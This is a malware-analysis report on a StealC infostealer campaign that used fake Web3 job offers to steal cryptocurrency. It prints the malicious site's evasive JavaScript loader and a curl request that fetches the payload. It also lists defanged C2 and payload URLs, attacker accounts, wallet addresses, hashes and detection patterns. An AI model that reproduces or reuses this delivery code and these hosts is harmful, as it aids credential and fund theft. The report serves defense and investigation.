{%hackmd C76nuH1pTfedlTW7n2cwbQ %} StealC - Web3 Employment Scams - Composition === Research and composition by: ℭ𝔦𝔭𝔥𝔢𝔯 ### Table of Contents [TOC] Executive Summary --- This report presents a detailed analysis of a confirmed malicious campaign involving the Stealc malware family, which impacts block-chain participants through deceptive executables. Originating from compromised social media accounts and misleading web domains, this malware has been instrumental in significant financial thefts distributed globally. This summary aims to elucidate the technical correlations observed during investigation, discuss the implications of these findings, and provide actionable insights for both the general public and law enforcement agencies. Confirmed User Impacts Reviewed --- > Note: Event details below have been compiled from adversely impacted users, which kindly allowed me to assist them with reviewing their respective cases and have granted me permission to include redacted variants of the aforementioned instances within this composition. This is not all those impacted by this malware campaign, a more comprehensive list of impacted users can be provided to law enforcement upon request. #### Twitter - Case 1 | **Key Information** | **Detail** | |:--------------------------------- |:-------------------------------------------------------------------------------------------------------------------------- | | Incident Date and Time | `Mar-06-2024 07:09:06 PM +UTC` | | Malware and Delivery Site | "Stealc" malware at `Segwit[.]blog` | | Snapshot of Malicious Site | [urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/](https://urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/) | | Malware Delivery Site Access Code | N/A | | Malware Distributed By | @Bowfr0g on Twitter, ID: N/A | | Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address | | :------- | -------- | :---------- | :------------------------------ | -------------------------------------------- | | Twitter | @Bowfr0g | N/A | N/A | `0x5959424246a971d115dd2394c9fcfb9e1b7df54e` | #### Twitter - Case 2 | **Key Information** | **Detail** | | :-------------------------------- | :------------------------------------------------------------------------------------- | | Incident Date and Time | `2024-03-20 22:33:11 UTC` | | Malware and Delivery Site | "Stealc" malware at `Spectra[.]chat` | | Snapshot of Malicious Site | [tria.ge/240315-lfj78ach6w/behavioral1](https://tria.ge/240315-lfj78ach6w/behavioral1) | | Malware Delivery Site Access Code | N/A | | Malware Distributed By | @Eddy_Bear27 on Twitter, ID:160548447 | | Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address | |:-------- |:-------------- |:------------------ |:------------------------------- |:-------------------------------------------- | | Twitter | @socialspectra | 2545667479 | N/A | | | | | | | | | Twitter | @doublexander | 888473816728567809 | N/A | | | Twitter | @0x_jiang | 998988969118400512 | N/A | | | Twitter | @dj_kubaking | 599584449 | N/A | | | Twitter | @Eddy_Bear27 | 160548447 | N/A | `0xAf11b5871f5Db632481CAF863503633FFF34a298` | #### Warpcast - Case 1 | **Key Information** | **Detail** | | :-------------------------------- | :------------------------------------------------------------------------------------- | | Incident Date and Time | `April 14, 2024 8:30AM EST` | | Malware and Delivery Site | "Stealc" malware at `cozymeta[.]xyz/join-metaverse` | | Malware Delivery Site Access Code | B89WB | | Malware Distributed By | @jane- on Warpcast, FID:351885 | | Snapshot of Malicious Site | [tria.ge/240414-ychw7see8v/behavioral1](https://tria.ge/240414-ychw7see8v/behavioral1) | | Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address | | :------- | -------- | :---------- | :------------------------------ | -------------------------------------------- | | Warpcast | jane- | 351885 | N/A | `0x06836d23a8b13f2d25a246d43787612ad7fc9009` | #### Warpcast - Case 2 | **Key Information** | **Detail** | | --------------------------------- | :------------------------------------------------------------------------------------- | | Incident Date and Time | April 16, 2024, 06:11:03 PM UTC | | Malware and Delivery Site | "Stealc" malware at `cozymeta[.]xyz/join-metaverse` | | Malware Delivery Site Access Code | RFWEF | | Malware Distributed By | @lampa on Warpcast, FID:372912 | | Snapshot of Malicious Site | [tria.ge/240315-lfj78ach6w/behavioral1](https://tria.ge/240315-lfj78ach6w/behavioral1) | | Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address | |:-------- | ---------- |:----------- |:-------------------------------------------- |:-------------------------------------------- | | Warpcast | Lampa | 372912 | `0x47ad1c7ea118f740fd54cdad14f776c66f814440` | `0xE8c8dC22Bacf97D48a20C3Bc493878E262D935C3` | | Telegram | @Lampa_eth | N/A | N/A | | Technical Analysis --- ### Analysis from "Twitter - Case 1" Initial Segwit[.]blog sample Victim’s browser activity and file downloads confirmed interactions with `Segwit.blog` and `Segwit.exe`. As such, the relevant source code of `Segwit.blog` was analyzed, stored, and cataloged for further analysis. The following section will elaborate on analysis conducted regarding `Segwit.blog` **Preface:** The primary function of `Segwit.blog` website is to serve as a social engineering agent and as a malware payload delivery system. **Analysis Environment Configuration:** Analysis on `Segwit.blog` conducted at 11:30PM EST March 7th, 2024. Utilized browserling.com virtual instance in a Windows 10 configuration running Google Chrome Version: 119. ![Segwit_blog_frontend](https://urlscan.io/screenshots/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e.png =600x400)`Segwit.blog`Frontend The image above is a sample captured of the `Segwit.blog` instance on the same day as the which funds were stolen from the victim. As can be observed the instance, clearly depicts an **"open"**,inviting **"web3 community"** environment. At a cursory glance, the instance does not appear malicious, if anything quite the contrary, all users need to do is simply provide a wallet address and sign-up. And logically install their `Segwit Setup.exe`. The issue is that the website has been intentionally designed with the premise of deceiving users and evading detection. How this was accomplished through the file-named: `7011-d483282552489351.js` will is documented below. #### **7011-d483282552489351.js** </br> <div style="display: flex; justify-content: space-between;"> <div align="left" style="width: 30%;"> ```mermaid flowchart TB start[start] checkAvailable[Check window.available<br><sub>Line: 4</sub>] checkBrowser[Check browser agent<br><sub>Lines: 6-9</sub>] osCheck[Check if Mac or Windows<br><sub>Line: 14</sub>] makePostRequest[Make API POST Request<br><sub>Lines: 14-20</sub>] handleError[Handle Error<br><sub>Line: 24</sub>] handleApiResponse[Handle API Response<br><sub>Lines: 22-23</sub>] createIframe[Create and Load Iframe<br><sub>Line: 30</sub>] setTrueState[Set True State<br><sub>Line: 25</sub>] showAlert[Show Alert<br><sub>Lines: 6, 15</sub>] start --> checkAvailable checkAvailable -->|false| checkBrowser checkAvailable -->|true| showAlert checkBrowser -->|Mobile| showAlert checkBrowser -->|Desktop| osCheck osCheck --> makePostRequest makePostRequest -->|Success| handleApiResponse --> createIframe --> setTrueState makePostRequest -->|Fail| handleError ``` </div> <div align="right" style="width: 70%; font-size: 12px;"> ```javascript= u = async (e) => { try { const test = function() { let check = false; (function(a) { if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true; })(navigator.userAgent || navigator.vendor || window.opera); return check; }; if (window.available === false || test()) { alert('Download is not available for your browser!'); return; } let t = await fetch(`/api/sign-up?system=${window.isMac ? 'mac': 'win'}&key=${window.__id}`, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify(e), }); if (!t.ok) { let { error: e } = await t.json(); throw Error(e.message); } debugger; let data = await t.json(); var n = document.createElement("iframe"); n.style.display = "none"; n.src = data.data; document.body.appendChild(n); d(!0); } catch (e) { r.negative("Something went wrong. Please try again later."), console.error(e); } } ``` </div> </div> #### **Code Explained** The script above performs device detection, conditional execution, API interaction, and dynamic content loading within a web environment: 1. **Device Type Detection**: Identifies mobile devices via user agent analysis to tailor behavior. 2. **Conditional Execution**: Uses `window.available` and device type to control flow, displaying alerts for incompatible devices, stopping further actions. 3. **API<sub>[^2]</sub> Interaction**: Makes a POST request to a sign-up API, including operating system type (Mac/Windows) in the request. This differentiation can affect server responses. 4. **Dynamic iFrame<sub>[^3]</sub> Creation**: On successful API response, creates an iFrame element and loads content from the response into it. This step is key for seamlessly integrating additional content or scripts. 5. **Error Handling**: Implements try-catch for robust error management, providing generic failure notifications and logging errors for debugging. 6. **State Update**: Signals task completion or a state change within the application. These operations, particularly those of device detection and dynamic content loading via iFrames, are leveraged to evade malicious signature detection by varying behavior based on the client's environment and discreetly executing additional code. #### **Payload Delivery** Executable Payload Delivered: `Segwit Setup.exe` Signatures: | **Name** | **Algorithm** | **File Hash** | |:----------------- | ---------- |:------------------------------------------------------------------ | | `SegwitSetup.exe` | **MD5** | `a22d71549d6b60c8c270503f585530ec` | | `SegwitSetup.exe` | **SHA1** | `0cb40b824f878a46e7bd55498331f2b87ddd6b25` | | `SegwitSetup.exe` | **SHA256** | `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb` | The payload which `7011-d483282552489351.js` called for via the [POST request](#7011-d483282552489351[.]js/api/sign-up?system=win) in this case was a Windows executable file called `Segwit Setup.exe`, this was verified via a controlled, direct website interaction approximately six hours after the initial adverse event. The executable was stored on a [Dropbox account](#dropbox-response). Request was crafted to retrieve the payload while appearing as a benign file download to the user's device. In other cases, it was observed that the payload can also be delivered as a Mac OS compatible DMG instance, in which case the payload filesize was greatly smaller. Once downloaded and executed the malicious payload begins to execute it's respective Stealc functionality in which it embeds itself into the system registry if on Windows for the objective of session persistence, and sends victim credentials to either a telegram or discord. Once this occurs the hack itself is not over, as the malicious actors then tranfer the user funds via a variety of different crypto currency exchanges, at first their transfers can be noticed from the impacted user's account which will typically within a five min timeframe post exploit begin unauthorized transfers of user cryptocurrency asset's. The initial transfers follow a 25-75 fund deviation in which it can be speculated that approximately 25% of the stolen funds are transferred to likely a malware as a service vendor, supplying a "customer" the malicious infostealer for use via social media communications. ##### **7011-d483282552489351[.]js/api/sign-up?system=win** ```curl curl 'hxxps[://]segwit[.]blog/api/sign-up?system=win&key=null' \ -H 'authority: segwit[.]blog' \ -H 'accept: */*' \ -H 'accept-language: en-US,en;q=0.9' \ -H 'content-type: application/json' \ -H 'origin: hxxps[://]segwit[.]blog' \ -H 'referer: hxxps[://]segwit[.]blog/' \ -H 'sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"' \ -H 'sec-ch-ua-mobile: ?0' \ -H 'sec-ch-ua-platform: "Windows"' \ -H 'sec-fetch-dest: empty' \ -H 'sec-fetch-mode: cors' \ -H 'sec-fetch-site: same-origin' \ -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119[.]0[.]0[.]0 Safari/537.36' \ --data-raw '{"ethAddress":"bobjones[.]eth"}' \ --compressed ``` ##### **dropbox-response** ```json! { "resp": true, "data": "hxxps[://]www[.]dropbox[.]com/scl/fi/5sbs7pzead0zqy4gi7r4s/Segwit-Setup[.]exe?rlkey=bill6374m4u45wz6qifxnl7de&dl=1" } ``` </br> Patterns --- ### MITRE Techniques | Tactic | Techniques | | -------------------- |:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Defense Evasion | [Access Token Manipulation - T1134](https://attack.mitre.org/techniques/T1134/)<br />[Software Packing - T1045](https://attack.mitre.org/techniques/T1045/)<br />[Indicator Removal on Host - T1070](https://attack.mitre.org/techniques/T1070/)<br />[Rundll32 - T1085](https://attack.mitre.org/techniques/T1085/)<br />[Modify Registry - T1112](https://attack.mitre.org/techniques/T1112/) | | Discovery | [System Owner/User Discovery - T1033](https://attack.mitre.org/techniques/T1033/)<br />[Software Discovery - T1518](https://attack.mitre.org/techniques/T1518/)<br />[Query Registry - T1012](https://attack.mitre.org/techniques/T1012/) | | Privilege Escalation | [Access Token Manipulation - T1134](https://attack.mitre.org/techniques/T1134/) | | Impact | [Endpoint Denial of Service - T1499](https://attack.mitre.org/techniques/T1499/) | | Execution | [Command and Scripting Interpreter - T1059](https://attack.mitre.org/techniques/T1059/) | #### Initial Discovery The initial sample for this investigation was encountered at the web domain: segwit[.]blog. The attack vector was a malicious payload disguised as a Windows video game executable and distributed through a stolen social media Twitter account. From this instance, monitoring was configured on the endpoint segwit[.]blog via a number of different elements respective to its functionality. One element that yielded interesting results was the return from its homepage image **filename: "Homepage_Hero_Desktop_Frame"** SHA256 file **hash: 7c7516dcff0bf59e7afc2cf3a3265c578d0c19c82bfb73ddaff1124a58bb88e6**. Within a week of the initial theft incident, a new domain recycling the aforementioned web assets appeared under the new domain "spectra[.]chat". Tests conducted on this unit for payload deployment correlations yielded a signature match belonging to the Stealc malware family. #### Linkages and Recurring Patterns Analysis into "spectra[.]chat" revealed numerous social media, Twitter posts, and website references promoting "employment opportunities". A "job board" connected to the website was hosted via Notion.so, specifically at the web domain: segwit[.]notion[.]site, with a web archive capture available [here](https://web.archive.org/web/20240308171520/https://segwit.notion.site/Job-Board-Segwit-App-4cc59bafbaf14786a0a7f072c111a3ee). The correlations between spectra[.]chat and segwit[.]blog appear substantial. Further analysis of the connected Link3 instance prompted an examination of variations of the segwit domain, with different iterations observed during a one-month monitoring span, as well as the [pattern](https://urlscan.io/search/#hash%3A7c7516dcff0bf59e7afc2cf3a3265c578d0c19c82bfb73ddaff1124a58bb88e6) used to monitor these instances: | Iteration Number | Website | Urlscan | |:--------------------- |:------------------ |:---------------------------------------------------------------------------------------------------------------------------------- | | 1(likely copied unit) | status\[.\]app | | | 2 | segwit\[.\]blog | [https://urlscan.io/result/f77f84aa-0074-4fe3-a60d-c335ae62cc7a/](https://urlscan.io/result/f77f84aa-0074-4fe3-a60d-c335ae62cc7a/) | | 3(linktree) | segwit\[.\]pro | [https://urlscan.io/result/9573f2db-eef8-4fcc-b7c4-8e63a195c0b4/](https://urlscan.io/result/9573f2db-eef8-4fcc-b7c4-8e63a195c0b4/) | | 4 | segwit\[.\]app | [https://urlscan.io/result/1cd8179b-46b9-4ada-bec3-279b3dae1494/](https://urlscan.io/result/1cd8179b-46b9-4ada-bec3-279b3dae1494) | | 5 | spectra\[.\]chat | [https://urlscan.io/result/8e7b914d-1274-4540-ba4f-67e088f1721a/](https://urlscan.io/result/8e7b914d-1274-4540-ba4f-67e088f1721a/) | | 6 | spectra\[.\]social | [https://urlscan.io/result/ad216e79-3a47-4f2e-afb0-87a750c62867/](https://urlscan.io/result/ad216e79-3a47-4f2e-afb0-87a750c62867/) | The correlation of these websites and the recycling of web assets, aligning with the reuse of a malware payload designed to evade antivirus detection, depict the sophisticated nature of this threat actor. The remaining components under review included social media accounts and other associated links from the [segwit link3](https://urlscan.io/result/dbf6e3b8-ddab-4593-93b5-181ca16bcd7b/#summary), showing connections between the now suspended Segwit Twitter account, a mirror publishing cryptocurrency address, a company registration in the United Kingdom, and current "employees" of segwit[.]blog. ![image](https://hackmd.io/_uploads/HJYHqkfzR.png =600x) *Members of the Segwit team as shown through link3* - [Fund Deviations[PUBLIC]](/90bFKQkTSqS0AtNwPOD6Gg) - [Twitter Data](/oonwUDGVSJ2KVCw2Ggo10A) - TBA #### Search Queries Triage ```js! family:stealc AND family:rhadamanthys NOT family:lumma NOT family:amadey NOT family:risepro NOT family:glupteba ``` Urlscan https://urlscan.io/search/#filename:%22remove_html.js%22 ### Configuration Relays - `showpiecekennelmating[.]com` - Private config files: [showpiecekennelmating[.]com/files/private/config](https://showpiecekennelmating[.]com/files/private/config) ![showpiecekennelmating](https://hackmd.io/_uploads/rk_FXmzbC.png =600x) ## Loader Patterns - Regex pattern for loaders: `\\b[a-zA-Z]+(?:-[a-zA-Z]+)*-Setup\\.exe\\b` - [ Analysis Via UnPacMe: https://www.unpac.me/results/a4e24a0a-7780-43d1-8328-f342c79420b6#/ ](https://www.unpac.me/results/a4e24a0a-7780-43d1-8328-f342c79420b6#/) ## Indicators of Compromise (IOCs) | IOC | | ---------------------------------- | | AdjustTokenPrivileges@ADVAPI32.dll | | LookupPrivilegeValueW@ADVAPI32.dll | | OpenProcessToken@ADVAPI32.dll | | Found string artifact shell32.dll | | RegEnumValueW@ADVAPI32.dll | | RegEnumKeyW@ADVAPI32.dll | | RegQueryValueExW@ADVAPI32.dll | | RegSetValueExW@ADVAPI32.dll | | RegCloseKey@ADVAPI32.dll | | RegDeleteValueW@ADVAPI32.dll | | RegDeleteKeyW@ADVAPI32.dll | | RegCreateKeyExW@ADVAPI32.dll | | SetFileAttributesW@KERNEL32.dll | | ExitWindowsEx@USER32.dll | | GetCommandLineW@KERNEL32.dll | ### IOC Samples Uploaded to VirusTotal - VirusTotal collection: [virustotal.com/gui/collection/1c180203a34147e613744dfc3b39d9a497f68c479729977185c7dadeb8288b3a/iocs](https://www.virustotal.com/gui/collection/1c180203a34147e613744dfc3b39d9a497f68c479729977185c7dadeb8288b3a/iocs) | Submission | Details | Verdict | Date | Tags | | | | ------------------------ |:-------------------------------------------------------------------------------------- |:--------------------- | ---------------- | -------------------- |:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --- | | PartyRoyale.exe | 0aef1e1f5f8cef19c63977278ca550ae4196d6ea13d51bc706bb64f03ea64ec6 application/x-dosexec | application/x-dosexec | Likely malicious | 05/02/2024, 04:13:01 | [peexe](https://www.filescan.io/search-result?tag=peexe)[txt](https://www.filescan.io/search-result?tag=txt)[xml](https://www.filescan.io/search-result?tag=xml)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | AppDFSetup.exe | 593c83930d6f0ca5e300b1728ed0a793d71ade9bbf3ab5ca6a4c38769c093a36 | application/x-dosexec | Likely malicious | 05/02/2024, 03:57:35 | [peexe](https://www.filescan.io/search-result?tag=peexe)[html](https://www.filescan.io/search-result?tag=html)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Wion Setup.exe | 67900fd8ba19d8be310f7db1a55073da24a4ba8b719c50520840fc77e571216b | application/x-dosexec | Likely malicious | 05/01/2024, 23:09:21 | [peexe](https://www.filescan.io/search-result?tag=peexe)[html](https://www.filescan.io/search-result?tag=html)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Vortax App Setup.exe | f3176e0859ba92049dcd57685c1b5f49b97183ff49fcc79f2ce4ad2b31d2d843 | application/x-dosexec | Likely malicious | 04/30/2024, 20:49:06 | [peexe](https://www.filescan.io/search-result?tag=peexe)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | MeetHub.exe | d96dd19f1fcd20277cee365d5fda7ecd1a776c046b2468d89f5f6a80a7d85c9f | application/x-dosexec | Malicious | 04/30/2024, 20:47:05 | [peexe](https://www.filescan.io/search-result?tag=peexe)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | VDeck Setup.exe | c29f6ca9ca0cbe27b9da4499d70add923459d23e69a701772530331a43cd71f8 | application/x-dosexec | Likely malicious | 04/30/2024, 20:46:16 | [peexe](https://www.filescan.io/search-result?tag=peexe)[html](https://www.filescan.io/search-result?tag=html)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Cozy World Setup.exe | 4cd4f861a3294923fc97f741927c8b67543ac54cfde6692c9e151920b1f61a19 | application/x-dosexec | Likely malicious | 04/30/2024, 09:01:10 | [peexe](https://www.filescan.io/search-result?tag=peexe)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Goheard.exe | 0ea35162ffccf5939f70fd8a932abe357cc4b84c96eb203ccc24bddbc08fc9ab | application/x-dosexec | Likely malicious | 04/29/2024, 20:24:19 | [peexe](https://www.filescan.io/search-result?tag=peexe)[txt](https://www.filescan.io/search-result?tag=txt)[xml](https://www.filescan.io/search-result?tag=xml)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Segwit_Setup.exe | 7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb | application/x-dosexec | Likely malicious | 04/29/2024, 07:20:28 | [peexe](https://www.filescan.io/search-result?tag=peexe)[html](https://www.filescan.io/search-result?tag=html)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | | Spectra Setup.exe | c4b3a3f21ad54d5c3370669ce1ff6c39f2affbaa02fdd42acfbd844c9c4074f9 | application/x-dosexec | Likely malicious | 04/29/2024, 07:17:58 | [peexe](https://www.filescan.io/search-result?tag=peexe)[xml](https://www.filescan.io/search-result?tag=xml)<br />[packed](https://www.filescan.io/search-result?tag=packed)<br />[lolbin](https://www.filescan.io/search-result?tag=lolbin)<br />[overlay](https://www.filescan.io/search-result?tag=overlay)<br />[shell32](https://www.filescan.io/search-result?tag=shell32) | | ### IP Addresses Analysis - VirusTotal graph: [virustotal.com/graph/g85ebc1fe497a495ebdad466bb04b9cde1e325be168ca4a4f85db0769271586bb](https://www.virustotal.com/graph/g85ebc1fe497a495ebdad466bb04b9cde1e325be168ca4a4f85db0769271586bb) ## Observed Structural Pattern of "helperFiles" | Type | ID | | ---- | -------------------------------------------------------------- | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/mozglue.dll` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/msvcp140.dll` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/freebl3.dll` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/nss3.dll` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/vcruntime140.dll` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/softokn3.dll` | | URL | `hxxp://193[.]163[.]7[.]129/1d7bef10a75b8ff3.php` | | URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/sqlite3.dll` | ## Execution Patterns - Error Observed Post Executable Download on Windows 10 Machines - “Unable to initialize program due to missing C++ driver. Please ensure that the required driver is installed.” User Impacts --- - [Cryptocurrency Employment Scam Incident Report Warpcast 1](/9Lz6OPltSy-yXSpwwtFW7g) - [Cryptocurrency Employment Scam Incident Report Warpcast 2](/rsczBuEDTFaUdSKTPB8vhg) [^1]: [context on the art style](https://webflow.com/blog/corporate-memphis) [^2]: [API definition and reference](https://www.ibm.com/topics/api) [^3]: [iFrame definition and reference](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe) References --- **StealC** - SEKOIA.IO. "StealC - A Copycat of Vidar and Raccoon Infostealers Gaining in Popularity Part 1." Retrieved from [https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/) - SEKOIA.IO. "StealC - A Copycat of Vidar and Raccoon Infostealers Gaining in Popularity Part 2." Retrieved from [https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/) **Similar Attack Vector** - "Distributed via PDF on X." Retrieved from [https://x.com/oscarxferral/status/1752765232190251037](https://x.com/oscarxferral/status/1752765232190251037) **DMG Samples From Security Researcher @d0wnlore** - Initial MeetHubGG DMG Sample[https://x.com/d0wnlore/status/1767824652657967165](https://x.com/d0wnlore/status/1767824652657967165) - DMG updated list [https://x.com/d0wnlore/status/1784113127094907235](https://x.com/d0wnlore/status/1784113127094907235) **Initial Segwit Blog Executable Sample Retrieved By @w3bsecops** - [https://twitter.com/w3bsecops](https://twitter.com/w3bsecops) **Stealc Deployment via PDF** - "Analysis of StealC PDF On X by Iamdeadlyz." Retrieved from [https://x.com/Iamdeadlyz/status/1754061842157293858](https://x.com/Iamdeadlyz/status/1754061842157293858) **Stealc Distribution via Discord** - "Distribution via Discord documented on X by ULTRAFRAUD." Retrieved from [https://x.com/ULTRAFRAUD/status/1632479744972267520](https://x.com/ULTRAFRAUD/status/1632479744972267520) **Static Analysis** - Glyc3rius. (2023). "Static Analysis of StealC." Retrieved from [https://glyc3rius.github.io/2023/10/stealc/](https://glyc3rius.github.io/2023/10/stealc/) - Farghlymal. "Stealc Stealer Analysis." Retrieved from [https://farghlymal.github.io/Stealc-Stealer-Analysis/#stealc-stealer-analysis](https://farghlymal.github.io/Stealc-Stealer-Analysis/#stealc-stealer-analysis) **Traffers** - SEKOIA.IO. "Traffers - A Deep Dive into the Information Stealer Ecosystem." Retrieved from [https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/](https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem/) - Outpost24. "Traffers and the Growing Threat Against Credentials." Retrieved from [https://outpost24.com/blog/traffers-and-the-growing-threat-against-credentials/](https://outpost24.com/blog/traffers-and-the-growing-threat-against-credentials/) **IOCs** - SEKOIA.IO Community. (2023). "StealC IOCs." Retrieved from [https://github.com/SEKOIA-IO/Community/blob/main/IOCs/stealc/stealc_iocs_20230220.csv](https://github.com/SEKOIA-IO/Community/blob/main/IOCs/stealc/stealc_iocs_20230220.csv) - VirusTotal. "ThreatFox Win StealC Collection." Retrieved from [https://www.virustotal.com/gui/collection/threatfox_win_stealc](https://www.virustotal.com/gui/collection/threatfox_win_stealc) **North Korea Bad Actors Target Job Hunters** - Palo Alto Networks Unit 42. "Two Campaigns by North Korea Bad Actors Target Job Hunters." Retrieved from [https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/) - The Hacker News. "Lazarus Group Targeting Defense Experts." Retrieved from [https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html](https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html) - InfoSec Institute. "What is Operation Dream Job by Lazarus?" Retrieved from 